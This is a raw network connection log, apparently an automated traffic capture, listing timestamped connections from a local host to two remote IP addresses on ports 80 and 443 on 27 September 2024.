                                                                                                                                                                Sep 27, 2024 17:42:36.448530912 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.484786034 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.484839916 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.484864950 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.484874964 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.586858988 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.586978912 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.692055941 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.692353010 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.697525978 CEST8049809185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.697568893 CEST8049808185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.697590113 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.697618961 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.697875023 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:36.702661037 CEST8049809185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.769378901 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.769428968 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:36.769633055 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.769998074 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:36.770014048 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.263865948 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.263957977 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.270778894 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.270787001 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.271042109 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.271991968 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.319390059 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.483922005 CEST8049809185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.483980894 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:37.484781981 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:37.489586115 CEST8049809185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.565628052 CEST49811443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.565687895 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.565766096 CEST49811443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.566229105 CEST49811443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.566241026 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.690371037 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.690473080 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.690526009 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.690924883 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.690938950 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.690951109 CEST49810443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:37.690954924 CEST44349810172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.731792927 CEST8049809185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.731863976 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:37.851752043 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:37.852076054 CEST4981280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:37.857084990 CEST8049809185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.857144117 CEST4980980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:37.857359886 CEST8049812185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:37.857441902 CEST4981280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:37.858397961 CEST4981280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:37.863326073 CEST8049812185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.047398090 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.047465086 CEST49811443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.072998047 CEST49813443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.073137045 CEST44349813172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.073210001 CEST49813443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.073874950 CEST49813443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.073913097 CEST44349813172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.076848984 CEST49811443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.076867104 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.077145100 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.102591991 CEST49811443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.143413067 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.336215019 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.336332083 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.336380005 CEST49811443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.336798906 CEST49811443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.336812973 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.336841106 CEST49811443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.336847067 CEST44349811172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.553558111 CEST8049812185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.554843903 CEST4981280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:38.570581913 CEST4981280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:38.571217060 CEST44349813172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.571304083 CEST49813443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.578727961 CEST8049812185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.589884996 CEST49813443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.589935064 CEST44349813172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.590296984 CEST44349813172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.591700077 CEST49813443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.635427952 CEST44349813172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.802301884 CEST8049812185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.802397013 CEST4981280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:38.853427887 CEST44349813172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.853575945 CEST44349813172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.853656054 CEST49813443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.853924990 CEST49813443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.853985071 CEST44349813172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.854022026 CEST49813443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:38.854038000 CEST44349813172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.925484896 CEST4981280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:38.926321030 CEST4981480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:38.931262016 CEST8049812185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.931277990 CEST8049814185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:38.931339025 CEST4981280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:38.931425095 CEST4981480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:38.932248116 CEST4981480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:38.937927008 CEST8049814185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.061342955 CEST49815443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.061394930 CEST44349815172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.061611891 CEST49815443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.062105894 CEST49815443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.062128067 CEST44349815172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.400904894 CEST49816443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.400942087 CEST44349816172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.401016951 CEST49816443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.401518106 CEST49816443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.401535988 CEST44349816172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.633012056 CEST44349815172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.633110046 CEST49815443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.656924963 CEST49815443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.656944990 CEST44349815172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.657319069 CEST44349815172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.665517092 CEST49815443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.675354004 CEST8049814185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.675544977 CEST4981480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:39.684696913 CEST4981480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:39.691418886 CEST8049814185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.711404085 CEST44349815172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.905369997 CEST44349815172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.905492067 CEST44349815172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.905586958 CEST49815443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.907602072 CEST8049814185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.909169912 CEST4981480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:39.910785913 CEST44349816172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.910851955 CEST49816443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.921735048 CEST49816443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.921772957 CEST44349816172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.922247887 CEST44349816172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.923059940 CEST49816443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.967398882 CEST44349816172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.983061075 CEST49815443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.983087063 CEST44349815172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:39.983098984 CEST49815443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:39.983107090 CEST44349815172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:40.037242889 CEST4981480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:40.037519932 CEST4981780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:40.077665091 CEST8049817185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:40.078358889 CEST4981780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:40.078653097 CEST4981780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:40.079498053 CEST8049814185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:40.079632044 CEST4981480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:40.084816933 CEST8049817185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:40.356524944 CEST44349816172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:40.356666088 CEST44349816172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:40.356717110 CEST49816443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:40.371390104 CEST49816443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:40.371423960 CEST44349816172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:40.803431988 CEST8049817185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:40.804673910 CEST4981780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:40.805481911 CEST4981780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:40.810750008 CEST8049817185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:40.887779951 CEST49818443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:40.887886047 CEST44349818172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:40.887976885 CEST49818443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:40.888639927 CEST49818443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:40.888676882 CEST44349818172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.035911083 CEST8049817185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.035980940 CEST4981780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:41.145797014 CEST4981780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:41.146163940 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:41.151776075 CEST8049817185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.152009964 CEST8049819185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.152962923 CEST4981780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:41.153028965 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:41.153410912 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:41.158195019 CEST8049819185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.378618956 CEST44349818172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.378788948 CEST49818443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:41.380755901 CEST49818443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:41.380790949 CEST44349818172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.381064892 CEST44349818172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.381869078 CEST49818443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:41.427412987 CEST44349818172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.616977930 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:41.617034912 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.617160082 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:41.617652893 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:41.617669106 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.828373909 CEST44349818172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.828501940 CEST44349818172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.828582048 CEST49818443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:41.828694105 CEST49818443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:41.828694105 CEST49818443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:41.828743935 CEST44349818172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.828771114 CEST44349818172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.931767941 CEST8049819185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:41.931847095 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:41.932569027 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:41.937370062 CEST8049819185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.112597942 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.112708092 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.114231110 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.114237070 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.114495039 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.127162933 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.164429903 CEST8049819185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.164509058 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.167443037 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.295066118 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.295372963 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.302840948 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.302912951 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.302968025 CEST8049819185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.303031921 CEST4981980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.306612015 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:42.312087059 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.370567083 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.370690107 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.370825052 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.379575968 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.379587889 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.379599094 CEST49820443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.379605055 CEST44349820172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.936824083 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.936876059 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:42.936994076 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.937298059 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:42.937315941 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.047832966 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.047919989 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.069158077 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.074402094 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.312967062 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.313080072 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.440481901 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.440566063 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:43.454751015 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.457469940 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.459887028 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:43.459913015 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.460247993 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.461788893 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:43.469702959 CEST8049821185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.469775915 CEST4982180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.471426964 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.471508980 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.503415108 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.517040014 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:43.522797108 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.734976053 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.735084057 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:43.735158920 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.109185934 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.109222889 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.109354019 CEST49822443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.109364033 CEST44349822172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.228558064 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.228801012 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.248790979 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.253781080 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.483057022 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.485595942 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.635293961 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.635790110 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.640500069 CEST8049823185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.640562057 CEST4982380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.640783072 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.640851021 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.644453049 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:44.649405003 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.947978973 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.948035002 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:44.948107004 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.948626041 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:44.948643923 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.341553926 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.341614008 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.360764980 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.365649939 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.407246113 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.407324076 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.409075022 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.409087896 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.409342051 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.411652088 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.455406904 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.584373951 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.584492922 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.703466892 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.703767061 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.708892107 CEST8049824185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.708956003 CEST4982480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.709500074 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.709640980 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.709882975 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:45.715053082 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.806466103 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.806577921 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:45.808938980 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.836628914 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.836667061 CEST44349825172.67.187.100192.168.2.4
